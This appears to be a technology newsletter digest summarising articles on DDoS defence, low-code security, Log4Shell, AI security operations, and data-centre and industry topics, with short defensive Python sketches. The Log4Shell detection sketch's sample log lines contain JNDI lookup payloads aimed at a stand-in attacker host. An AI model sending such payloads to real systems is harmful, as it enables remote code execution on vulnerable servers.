Quote for the day:

"Appreciate the people who can change their mind when presented with true information that contradicts their beliefs." -- Vala Afshar


Understanding DoS and DDoS attacks: Their nature and how they operate



In the modern digital landscape, understanding Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks is critical for maintaining organizational resilience. While a DoS attack originates from a single source to overwhelm a system, a DDoS attack leverages a global botnet of compromised devices, making it significantly more complex to detect and mitigate. These attacks aim to disrupt essential services, causing severe operational disruption and financial losses, with downtime costs potentially exceeding six thousand dollars per minute. High-availability networks are particularly vulnerable, as massive traffic volumes can overwhelm redundancy, trigger failovers, and degrade the overall user experience. To counter these evolving threats, the article emphasizes a multi-layered defense strategy incorporating proactive traffic monitoring, rate limiting, and Web Application Firewalls. Specialized solutions like scrubbing centers, which filter malicious packets from legitimate traffic, and Content Delivery Networks are also vital for absorbing large-scale assaults. Ultimately, the article argues that business continuity depends on shifting from reactive measures to advanced, scalable security frameworks that protect both infrastructure and brand reputation. By adopting these robust defenses, organizations can navigate an increasingly hostile environment and keep their core digital operations accessible and reliable under sustained attack.
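To make the rate-limiting layer mentioned above more concrete, here is a minimal token-bucket sketch in Python. It is an illustration only, not the article's method: the class name `TokenBucket`, its parameters, and the injectable `now` clock are all assumptions made for the example.

```python
import time


class TokenBucket:
    """Hypothetical per-client limiter: bursts up to `capacity`, refilled at `rate` tokens/second."""

    def __init__(self, rate, capacity, now=None):
        self.rate = rate
        self.capacity = capacity
        self.tokens = capacity  # start with a full bucket
        self.updated = time.monotonic() if now is None else now

    def allow(self, now=None):
        """Return True if one request may proceed at time `now`, consuming a token."""
        now = time.monotonic() if now is None else now
        elapsed = max(0.0, now - self.updated)
        # Refill in proportion to elapsed time, never above capacity.
        self.tokens = min(self.capacity, self.tokens + elapsed * self.rate)
        self.updated = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


# Usage: one bucket per source address (an assumption; other keys are possible).
buckets = {}


def allow_request(client_ip, now=None):
    bucket = buckets.setdefault(client_ip, TokenBucket(rate=5.0, capacity=10.0, now=now))
    return bucket.allow(now=now)
```

A limiter keyed on the source address mainly helps against a single noisy source. Distributed traffic spreads across many addresses, which is one reason the summary pairs rate limiting with scrubbing centers and Content Delivery Networks.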


Low code, no fear

The article "Low code, no fear" explores how CIOs are increasingly adopting low-code/no-code (LCNC) platforms to accelerate digital transformation and address developer shortages. While these tools empower citizen developers and enhance business agility, they introduce significant security risks, such as accidental data exposure and misconfigurations. To mitigate these threats, the author argues that LCNC development must be integrated into the broader IT ecosystem through a DevSecOps lens. This involves establishing rigorous governance standards, version controls, and automated security guardrails early in the development lifecycle. Specific strategies include implementing policy-as-code templates, automated CI/CD pipeline scanning, and "shift-left" vulnerability testing like SAST and DAST. Additionally, organizations should employ runtime monitoring and data loss prevention measures to prevent sensitive information leaks. By treating low-code projects with the same discipline as traditional software engineering, leaders can ensure that speed does not compromise security. Ultimately, the goal is to foster a culture where innovation and robust security coexist, preventing LCNC from becoming a dangerous form of "shadow IT" within the enterprise. Maintaining clear metrics on deployment frequency and remediation velocity is essential for balancing rapid delivery with effective risk management across all application development activities.
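The policy-as-code idea above can be sketched as a small set of named rules evaluated against an app's exported configuration. This Python sketch is purely illustrative: the configuration keys (`owner`, `public_sharing`, `connections`, `tls`) and the rules themselves are hypothetical and do not come from the article or from any particular LCNC platform.

```python
# Each rule is (description, check); the check returns True when the app complies.
RULES = [
    (
        "data connections must use TLS",
        lambda app: all(c.get("tls", False) for c in app.get("connections", [])),
    ),
    (
        "public sharing must be disabled",
        lambda app: not app.get("public_sharing", False),
    ),
    (
        "an owner must be recorded",
        lambda app: bool(app.get("owner")),
    ),
]


def evaluate(app):
    """Return the descriptions of every rule the app configuration violates."""
    return [name for name, check in RULES if not check(app)]


# Usage: a hypothetical exported app definition.
app = {
    "owner": "finance-team",
    "public_sharing": True,
    "connections": [
        {"name": "crm", "tls": True},
        {"name": "legacy-db", "tls": False},
    ],
}
violations = evaluate(app)
```

Run as a pipeline step, a check like this could fail a deployment whenever `violations` is non-empty, which is one way to apply a guardrail early in the lifecycle.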


SANS: Top 5 Most Dangerous New Attack Techniques to Watch

At the RSAC 2026 Conference, the SANS Institute revealed its annual list of the "Top 5 Most Dangerous New Attack Techniques," which are now almost entirely powered by artificial intelligence. The first technique highlights the rise of AI-generated zero-days, which has shattered the barrier to entry for high-level exploits by making vulnerability discovery both cheap and accessible to a wider range of threat actors. Secondly, software supply chain risks have intensified, shifting the industry focus toward the "entire ecosystem of suppliers" and the cascading dangers of third-party dependencies. The third threat identifies an "accountability crisis" in operational technology (OT) and industrial control systems, where a critical lack of forensic visibility prevents investigators from determining if infrastructure failures are mere accidents or sophisticated cyberattacks. Fourth, experts warned against the "dark side of AI" in digital forensics, cautioning that using AI as a primary decision-maker without human oversight leads to flawed incident responses. Finally, the report emphasizes the necessity of "autonomous defense" to counter AI-driven attacks that move forty-seven times faster than traditional methods. By leveraging tools like Protocol SIFT, defenders aim to accelerate human analysis and close the widening speed gap. Together, these techniques underscore a transformative era where AI dictates the pace and complexity of modern cyber warfare.

Why services have become the true differentiator in critical digital infrastructure

The article argues that in the rapidly evolving landscape of critical digital infrastructure, hardware alone no longer provides a competitive edge; instead, comprehensive services have become the primary differentiator. As data centers face increasing complexity driven by AI, high-density computing, and hybrid architectures, the focus has shifted from initial equipment acquisition to long-term operational excellence. Technological parity among major manufacturers means that physical products are often comparable, placing the burden of performance on lifecycle management and expert support. This transition is further fueled by a global skills shortage, leaving many organizations without the internal expertise required to maintain sophisticated power and cooling systems. Consequently, service partnerships that offer proactive maintenance, remote monitoring, and rapid emergency response are essential for ensuring maximum uptime and mitigating the exorbitant costs of downtime. Moreover, the article emphasizes that tailored services play a vital role in achieving sustainability goals by optimizing energy efficiency throughout the asset's lifespan. Ultimately, the true value of infrastructure is realized not through the hardware itself, but through the specialized services that ensure reliability, scalability, and efficiency in an increasingly demanding digital economy, making the choice of a service partner more critical than the equipment specifications.

AI SOC vendors are selling a future that production deployments haven’t reached yet

The article "AI SOC vendors are selling a future that production deployments haven't reached yet" examines the significant gap between marketing promises and the operational reality of AI in Security Operations Centers. While vendors champion autonomous threat investigation and "humanless" operations, actual market adoption remains stagnant at roughly one to five percent. Research indicates that most organizations are trapped in "pilot purgatory," utilizing AI only for low-risk tasks like alert enrichment or report drafting rather than critical decision-making. The authors argue that vendors systematically misattribute this slow uptake to buyer resistance or psychological barriers, whereas the true cause is product immaturity. In live production environments, AI often struggles with non-linear attack paths and lacks the contextual awareness found in custom-built internal tools. Furthermore, reliance on probabilistic AI outputs can inadvertently degrade analyst judgment and obscure operational risks through misleading alert reduction metrics. Experts advocate for a shift in vendor strategy, moving away from "prophetic" claims of total automation toward developing narrow, reliable tools that serve as capability amplifiers. Ultimately, for AI SOC solutions to achieve enterprise readiness, vendors must prioritize transparency, deterministic logic, and verifiable evidence over aspirational marketing narratives.

Meshery 1.0 debuts, offering new layer of control for cloud-native infrastructure

The debut of Meshery 1.0 marks a significant milestone in cloud-native management, introducing a crucial governance layer for complex Kubernetes and multi-cloud environments. As organizations struggle with "YAML sprawl" and the rapid influx of AI-generated configurations, Meshery provides a visual management platform that transitions operations from static text files to a collaborative "Infrastructure as Design" model. At the heart of this release is the Kanvas component, featuring a generally available drag-and-drop Designer for infrastructure blueprints and a beta Operator for real-time cluster monitoring. These tools allow engineering teams to visualize resource relationships, identify configuration conflicts, and automate validation through an embedded Open Policy Agent engine. Beyond visualization, Meshery 1.0 offers over 300 integrations and a built-in load generator, Nighthawk, for performance benchmarking. By offering a shared workspace where architectural decisions are documented and verified, the platform directly addresses the challenges of tribal knowledge and configuration drift. As one of the Cloud Native Computing Foundation's highest-velocity projects, Meshery’s move to version 1.0 signals its maturity as a standard for expressing and deploying portable infrastructure designs while preparing for future AI-driven governance integrations.

What is the Log4Shell vulnerability?

The Log4Shell vulnerability, officially designated as CVE-2021-44228, represents one of the most significant cybersecurity threats in recent history, primarily due to the ubiquity of the Apache Log4j 2 logging library. Discovered in late 2021, this critical zero-day flaw earned a maximum CVSS severity score of 10/10 because it enables remote code execution with minimal effort from attackers. By sending a specially crafted string to a server, often through common inputs like web headers or chat messages, malicious actors can trigger a Java Naming and Directory Interface (JNDI) lookup to a rogue server, allowing them to execute arbitrary code and gain complete system control. The article emphasizes that the vulnerability's impact is vast, affecting everything from cloud services like Apple iCloud to popular games like Minecraft. Identifying every instance of the flawed library remains a major challenge for IT teams because Log4j is often embedded deep within complex software dependencies. Consequently, patching is described as non-negotiable, with organizations urged to upgrade to the latest secure versions of the library immediately. This security crisis underscores the inherent risks found in widely used open-source components and the urgent need for robust supply chain security.
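As a rough illustration of what the "specially crafted string" looks like in practice, the following Python sketch flags log or request lines containing the plain `${jndi:` lookup prefix. The function name `find_jndi_lookups` and the sample lines are assumptions made for the example. The pattern covers only the unobfuscated form, so it should be read as a triage aid under that assumption, not as a complete detector and not as a substitute for patching.

```python
import re

# Matches the plain lookup prefix, e.g. ${jndi:ldap://host/a}, in any letter case.
# Obfuscated variants (for example, nested lookups that assemble "jndi" piece by
# piece) are NOT matched by this simple pattern.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_jndi_lookups(lines):
    """Return (line_number, line) pairs for lines containing a plain JNDI lookup string."""
    return [
        (number, line)
        for number, line in enumerate(lines, start=1)
        if JNDI_PATTERN.search(line)
    ]


# Usage: hypothetical request headers as they might appear in an access log.
sample = [
    "GET / HTTP/1.1",
    "User-Agent: ${jndi:ldap://attacker.example/a}",
    "X-Api-Version: ${JNDI:rmi://attacker.example/b}",
]
hits = find_jndi_lookups(sample)
```

Because attackers can disguise the string, a clean scan does not show that a system was never targeted. Upgrading the library, as the summary stresses, remains the actual fix.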

Software-first mentality brings India into future: Industry 4.0 barometer

The eighth edition of the Industry 4.0 Barometer, published by MHP and LMU Munich, highlights how a "software-first" mentality is propelling India to the forefront of the global industrial landscape. Ranking third internationally behind the United States and China, India demonstrates remarkable investment readiness and strategic ambition in adopting digital technologies. The study reveals that 61 percent of surveyed Indian companies already utilize artificial intelligence in production, while 68 percent leverage digital twins in logistics. This rapid digitization is anchored in Software-Defined Manufacturing (SDM), where production excellence is increasingly dictated by software, data, and integrated IT/OT architectures. Unlike the DACH region, where only 17 percent of respondents expect fundamental industry change from software-driven approaches, 44 percent of Indian leaders are convinced of such transformation. This discrepancy underscores India’s proactive willingness to evolve, moving beyond traditional manufacturing to embrace a future where smart algorithms and solid data infrastructures are central. Ultimately, the report emphasizes that consistent integration of software and production control is no longer optional but a critical factor for maintaining global relevance, positioning India as a formidable leader in the ongoing digital revolution of industrial production.

Facial age estimation adoption puts pressure on ecosystem

The article "Facial age estimation adoption puts pressure on ecosystem" highlights the rapid integration of biometric age verification technologies amidst intensifying global legal mandates and shifting regulatory responsibilities. As adoption accelerates, the industry faces a critical bottleneck: the demand for system evaluation and testing capacity is currently outstripping available methodologies. This surge has prompted stakeholders, including the European Association for Biometrics, to address the complexities of training algorithms, which require vast, diverse datasets to ensure accuracy across demographics. Technical hurdles remain significant, particularly regarding "bias to the mean," where systems frequently overestimate the age of younger users while underestimating older individuals. Additionally, traditional Presentation Attack Detection struggles with sophisticated spoofs, such as aging makeup, which mimics live facial features effectively. The piece also references real-world applications like Australia’s Age Assurance Technology Trial, noting that while privacy concerns caused some to opt out, peer participation eventually boosted engagement. Ultimately, effective implementation now depends on refining confidence-range metrics rather than relying on absolute age estimates. The future of the ecosystem relies on the emergence of more rigorous, fine-grained standards and fusion techniques to maintain integrity in an increasingly scrutinized and legally demanding digital environment.
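One way to read the point about confidence ranges is that a gate should decide on an interval around the estimate, not on the point estimate alone. The Python sketch below illustrates that idea under stated assumptions: the function `age_gate`, the symmetric `margin`, the threshold of 18, and the three outcomes are all hypothetical and are not taken from the article or from any standard.

```python
def age_gate(estimate, margin, threshold=18):
    """Decide on the interval [estimate - margin, estimate + margin], not the point estimate.

    Returns "pass" when the whole interval is at or above the threshold,
    "fail" when the whole interval is below it, and "escalate" when the
    interval straddles the threshold and another check is needed.
    """
    low = estimate - margin
    high = estimate + margin
    if low >= threshold:
        return "pass"
    if high < threshold:
        return "fail"
    return "escalate"


# Usage: an estimate of 19 with a 3-year margin straddles 18, so it is not waved through.
decision = age_gate(19, 3)
```

A wider margin sends more borderline users to a secondary check. That is a plausible trade-off given the "bias to the mean" described above, where younger users tend to be estimated as older than they are.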


Streamline physical security to enable data center growth in the era of AI

The rapid proliferation of artificial intelligence is driving a monumental expansion in data center capacity, creating a "space race" where physical security must evolve from a tactical necessity into a strategic competitive advantage. As colocation and hyperscale providers face unprecedented demand, Andrew Corsaro argues that traditional project-based approaches are no longer sufficient; instead, organizations must adopt a programmatic mindset characterized by repeatable processes, standardized designs, and the intelligent reuse of institutional knowledge. Scaling at AI speed requires a transition where approximately 95 percent of security implementation is standardized, allowing teams to focus on the 5 percent of truly novel challenges, such as airborne drone threats or the physical implications of advanced cooling technologies. Furthermore, the integration of automation, digital twin modeling, and strategic partnerships is essential to maintain precision without sacrificing quality. By embedding security experts into the early stages of the development lifecycle, providers can navigate dynamic regulatory shifts and emerging threat vectors effectively. Ultimately, those who successfully streamline their physical security frameworks will be best positioned to achieve sustainable, high-speed growth in the AI era, transforming potential operational chaos into a disciplined, resilient, and highly scalable delivery engine.

